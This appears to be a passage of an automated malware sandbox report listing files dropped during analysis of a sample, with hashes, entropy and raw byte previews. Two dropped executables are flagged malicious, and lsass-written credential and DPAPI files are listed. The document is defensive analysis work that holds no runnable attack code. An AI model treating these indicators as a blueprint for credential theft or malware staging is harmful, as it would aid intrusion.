                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.0.8.<./.P.i.

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE718.tmp.xml

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4800
                                                                                                                                                                                                                                              Entropy (8bit):4.473972843202252
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsSwJg771I9gzWpW8VY/Ym8M4JUy2F/yq8vKy1L5r+Fd:uIjf1I7zC7VvJmW5L5r+Fd
                                                                                                                                                                                                                                              MD5:494EBB7856071022C690A2732D405820
                                                                                                                                                                                                                                              SHA1:040DE1BAE458F92BDBEE2681C411360C18478727
                                                                                                                                                                                                                                              SHA-256:CDAB97965F8944B3F2015C98447750334F3DC1CA9C2D2506D0069880D6370E7D
                                                                                                                                                                                                                                              SHA-512:710DF770D89C2F58AE39E39D23534C6CBCB120C0CC0F6261D2DF0D395FAA7AF34F2DAE0C85C8DD61CA484D144CDACBF118D28F855898678979F8B478F12A18FB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="544343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE725.tmp.csv

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):79586
                                                                                                                                                                                                                                              Entropy (8bit):3.043014628278272
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:O5rSEZ3yxXjxkAO1oXhHkXuqwMZbJa4bjiyT7fQYMOisU4z:O5rSEZ3yxXjxkAO1oXhHkXuqwMZbJa4D
                                                                                                                                                                                                                                              MD5:CD4ECE4507099D9D6FF67CDA556AFC7C
                                                                                                                                                                                                                                              SHA1:D5524F3725039208080DF56DEDC2FFE6E2B2FC0E
                                                                                                                                                                                                                                              SHA-256:07525F195C52A5AD2A96B5B2BDEC36CD505DE5EE76C01ADA18C6B06BD5A98A47
                                                                                                                                                                                                                                              SHA-512:AB1DEC7EF152016C5DCDD1AED86E91E9B1DC6503602691903A588F757BF492ACC6E4D2E62200DF7AD159CAB463F7BCB0145357B24CDEAC30C4F6BB84C9CC49E0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERE774.tmp.txt

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                                                              Entropy (8bit):2.6850547241904876
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TiZYWgSVf+CIEYPYhWaTH2UYEZe0tEiQk2hSCwjqHPaNZv6dMDnFIAw3:2ZDPpo16kPaNZwMDnaAw3
                                                                                                                                                                                                                                              MD5:F4A9C87C4894A4F38E0BB58C0559D34B
                                                                                                                                                                                                                                              SHA1:9CA197B6CA3D17C7DCD5906877A115FFF952F06B
                                                                                                                                                                                                                                              SHA-256:08BD6B140B20BF83F9C18837D1F41635010E18C2C0F787A4F22D529205E6AB36
                                                                                                                                                                                                                                              SHA-512:57D0976F08131F5530AFD510B65475F85D71837B77BA03C8F3B10B454239671089FCC4C25ED7D5A477DA0C22FFB1F9D5867C052DE079DAD178BEAE6A11E66D1A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4770
                                                                                                                                                                                                                                              Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                              MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                              SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                              SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                              SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7796
                                                                                                                                                                                                                                              Entropy (8bit):7.971943145771426
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                                                                                                                                                                                                                              MD5:FB60E1AFE48764E6BF78719C07813D32
                                                                                                                                                                                                                                              SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                                                                                                                                                                                                                              SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                                                                                                                                                                                                                              SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..|..9.........{...|d..v.T..w.TMZ.|...).F.rtAm.....f......T.*.......n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w*..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...|.h..$."r..hL9TR..}.v%...4).H..[.....r..|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):302
                                                                                                                                                                                                                                              Entropy (8bit):3.8110300700394646
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kK/NxSwfsJhN+SkQlPlEGYRMY9z+s3Ql2DUe/:/7kPlE99SCQl2DUe/
                                                                                                                                                                                                                                              MD5:AB61BC675E520E260B10588D2BFC0DBD
                                                                                                                                                                                                                                              SHA1:A89A4B126BD06738EB1C9C3DC766A067B6AB72E3
                                                                                                                                                                                                                                              SHA-256:18EE09D2AFB14E49A17EFF4C8B640B2BEBB4F5C4398A2D9605A86DD132E83708
                                                                                                                                                                                                                                              SHA-512:7D07B0FA6AC8EF67C64C362679976D99ACB78AA7F05A6B2E9B986C9BB7EEB44A8D3929A36CC0607D4C597869125621801BED92038826E8F8C6702F6DCD1D3110
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ........<P=y....(...............<P=y....<..i...<...X...........<..i... .........p.........................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):290
                                                                                                                                                                                                                                              Entropy (8bit):3.825820525451351
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kKysRoWdMb+XFVDjYEs8uSUN+SkQlPlEGYRMY9z+4D1QuflIe/:3Mb+XjUEXkPlE99Si1QyIe/
                                                                                                                                                                                                                                              MD5:9A74601A7D7AE27D4C970BE78F811EF0
                                                                                                                                                                                                                                              SHA1:4745EA698203A82F6C6BCFEA4D8A1280C64EF36A
                                                                                                                                                                                                                                              SHA-256:3DEA9C703D4E289B0D05A6F439A3F97929A6391A43F1282600173352C062BF2B
                                                                                                                                                                                                                                              SHA-512:C6636151B101A052A63EBCCD596D91B6FFD3271E4EFB96F15D0A44D76ECCFE7345E0F8702D72C827BAEC08C6CE0F380D34E37526CD9604BE29F63C7F1C18C2DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ..........5.....(........................u..i.....v.X............u..i... ........B@!....................t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):11152
                                                                                                                                                                                                                                              Entropy (8bit):7.972796460501386
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:p/4TmJ6disGipZuGasyXOJEZZTcwxCXYDkAsIviv7ISviMEQnwvJO3pzF1qyJ4Tf:pAqXGpb6rGYHikWxsO5HfJ4Tf
                                                                                                                                                                                                                                              MD5:52A427A42BBFD0818A5367E6B1EF77E7
                                                                                                                                                                                                                                              SHA1:79350A94B4E867AC768CBDF900B02DEB5E0C0C59
                                                                                                                                                                                                                                              SHA-256:E2C25CD987145AC52B1AC6F06750237CBB8CDB84CBDABF74B493704182C93AFA
                                                                                                                                                                                                                                              SHA-512:2D7EB5CF609BE3E8D9533E08D111B2335213987D3DF4B5EC2C52A3D9279847B12D0ED2B1FAB6BFE0A3A3633C941EE33DF9BC55D172234C1D29F4F83C39837376
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.....+..................z..O..........9e.D.j...h..... 0...L.o.c.a.l. .C.r.e.d.e.n.t.i.a.l. .D.a.t.a........f...... ...Vj3.U..",[l3.\..v..r.e=.................... ..../......Y*8Q.o....K..VLu.}.......*....~4..~].$./..0.....3...a.;^.:.....h!...:.I.d~Y.P.H7...f.*......^...}Qa.+.E..._`......-..w.....Bq.C..$....0...F.....&4..U....@+.[$...I..\..U.S.._.?.wQ......-...9(.....7....3.m.hd;W..P...oLOd^.{c./....s~...*.0...\.....%..".h!....f*.w.F.1.H.l.a3.......U....l.Cr7H..2......W.R0......M...9x..w.r....Ig1.m.C..`.\.k&..A!..U.qr.A...?2.Gm.............:W...Ee......M...*..P.$..Y..KC.d.1..A...-OrQN9H..Z...m...j.H.W.. .i}...mFO-L..zd..#....j.....@.q~..Q...Z{.*.N....#.W.|..Ny+.."...m%\h...P.y.-..+..."i....u...Z..'zI4w....1Wr.4..t#...W..:..j~.}E....y.5+.B.uu......d..ev."mT..w......3...;.#n....o@.....xd.........Ap~..<l.w....r.. 0ZR.j.g....Q~.~..-.v..n.].7F...#........eWj......../.`.8+....Z.\*...q-"..^..m......L0U2.&}Vj....I.V...1mU...Z`BH. ......t......QG..O{^.As.

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                              Entropy (8bit):4.501629167387823
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:xMoaBj:qoaBj
                                                                                                                                                                                                                                              MD5:E95CEB364BD1600750A30F77482D089D
                                                                                                                                                                                                                                              SHA1:025826D55E0BEBF0B6B433B32659193D5ED5A411
                                                                                                                                                                                                                                              SHA-256:13DA13123B9255B88D76BFD003D8936E99A400860C4B34FC111CD78F99650441
                                                                                                                                                                                                                                              SHA-512:A1028EEA950E2DE33554260BB1745DB3B03C781FAF7963D7255C907FBAEBE91CA4357C58630D3F682B6AD9C1FA2EB9F0446FC60E17E339DFD6364B9CF6679B4F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:....9e.D.j...h...+i.e..

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\c5d68a1c-6539-448b-b76a-9bfdf868ce00

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):468
                                                                                                                                                                                                                                              Entropy (8bit):6.407805178616268
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:brY7uyCgQn3LZTUdKszfvbuCSZ46Ej0/cABO:suQq5kfvatGdHABO
                                                                                                                                                                                                                                              MD5:7433783060BDAAE0C08EBA02E5CA982E
                                                                                                                                                                                                                                              SHA1:D409264EF420D51EB29EDEEC54E60B73BD307AB6
                                                                                                                                                                                                                                              SHA-256:059F6820A5CB31D76446242E1B81B77DBE54F0A5D514AADA657F689BFF03E5EE
                                                                                                                                                                                                                                              SHA-512:B8AFC4CC1648FDAE2BD47777E54F15DBAF781E21C71737057DE997F43169BB3FAA3F427A228D4D75AE7A6E4FDA4594F8761BC3A5AA4755933B51D3AD412B6DA8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:............c.5.d.6.8.a.1.c.-.6.5.3.9.-.4.4.8.b.-.b.7.6.a.-.9.b.f.d.f.8.6.8.c.e.0.0.................................................W.....F...Y.....@........f..n.2..G...sk.....L......\....-..$!.Z7#..h...\..kK.j......L.m..#ZI....yU..S.PN..o4Z.8...J....R...>.T..5Qe..4"..E....f..z.(.B(.......Z....L+....n|.k...sE....'S@........f..B*.).;....>nz\..].}..+w....!.8...ec8..{..*~.Z.V.9In..........fs.n4%.`..{.PW^.&z..g.H..TF0.....6......./......@..1.=OL....X.k

                                                                                                                                                                                                                                              C:\Users\user\Desktop\wzcsapi.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):34816
                                                                                                                                                                                                                                              Entropy (8bit):7.415585647348422
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:sokC1JY3bft56FUqKCnhhrqIvji1QuUkJV3NksbRY4ChV:ICgLt56GCnXemi1QuLV3bbRAV
                                                                                                                                                                                                                                              MD5:64FFE7C0FA6AC22F5ACAFD3CEB4ACA5B
                                                                                                                                                                                                                                              SHA1:104182708267EE1A6DA0E9E83CB04DF83EDAE120
                                                                                                                                                                                                                                              SHA-256:6B5C2E9A2EF36412B2636236ADE5530C59573B51B07FE224FD980911CBB7B976
                                                                                                                                                                                                                                              SHA-512:F136D69BB6BE51CF7E1E6F0E4538CB951337CB278344B348E749F67A6F08C1DF01264BD3275ED9A36B776DFB1B9B75F31F8BCEC102F8B50D50913AA883B13066
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;.Lf.................~..........N.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...T|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................0.......H.......8................%..m^............................................(....*..(....*.s.........s.........s.........s.........*..(&...*b~....,.~....o0.........*.(U...oV...oW........r...p.....r...p.....r#..p(X........*.0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............( ...(!....+..*....0...........("....+..*..0...............(#....+..*..0...........($....+..*..0................-.(...+.+.+...+..*.0..

                                                                                                                                                                                                                                              C:\Users\user\Desktop\wzcsvc.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\r8k29DBraE.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):165376
                                                                                                                                                                                                                                              Entropy (8bit):5.879250179552107
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:bc28KbSCtn8Mo8G1gVziHzZbIK1YKB/pCA8tqXhwBV3yxSQig8xN:bX5bsgVziHzZnSKrC7IM
                                                                                                                                                                                                                                              MD5:A69C6E092D415063A9FB80F8FE4E3444
                                                                                                                                                                                                                                              SHA1:8B26A0FD01B1E48F7110CFFECF6BC3B9D0822E9A
                                                                                                                                                                                                                                              SHA-256:F7DD8D6299C108A3221C31BF33637F59F0E19703AAA88B1E3A4F1093E7209A5D
                                                                                                                                                                                                                                              SHA-512:4E69B49D65F68FF913AFBC991F06509645AC69850182F557CA625AD5CF92832059DDADB4AF547CFB4FD84C4B24CF55A1CE3D9D6D466112E9581908D4E4D2DA38
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: wzcstatus.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@.......................................sr......!..L.!This program cannot be run in DOS mode....$........K...*..*..*...R..*...R..*..*...*..p...*..p.7.*..p...*..Rich.*..........PE..d....0f.........."....'.....f......P".........@..........................................`.................................................D8.......p..`N...`..8...................X5..8............................................0...............................text............................... ..`.rdata.......0......."..............@..@.data........P......................@....pdata..8....`.......4..............@..@.rsrc...`N...p...P...6..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\7415a32d-d2c0-4e8d-943e-3e817e4bf894

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):468
                                                                                                                                                                                                                                              Entropy (8bit):6.235848758957034
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:SjIVl1102GTnsc5a98YaU9+qZup9/VJSB:SjIbpGTha98YqBA
                                                                                                                                                                                                                                              MD5:56F7EEEB88A200BE3FF4BAD1293F0BF8
                                                                                                                                                                                                                                              SHA1:B1137994999EE63E644605EFBC4DB1F0612E58FC
                                                                                                                                                                                                                                              SHA-256:28EB63CF7A89B6C34262D8A564E5DD9FFA355A5AAECAA6F336DCD1A64C7AA711
                                                                                                                                                                                                                                              SHA-512:CE7FF74D3BA7644E0171A05D27944C88328EE1F7B9D3365F9CEAC7F42E423C2A5D3EB1776F84136E9FEAAD0C48A04C8901AC846181664B9C04DA68BD514CF71A
                                                                                                                                                                                                                                              Malicious:false
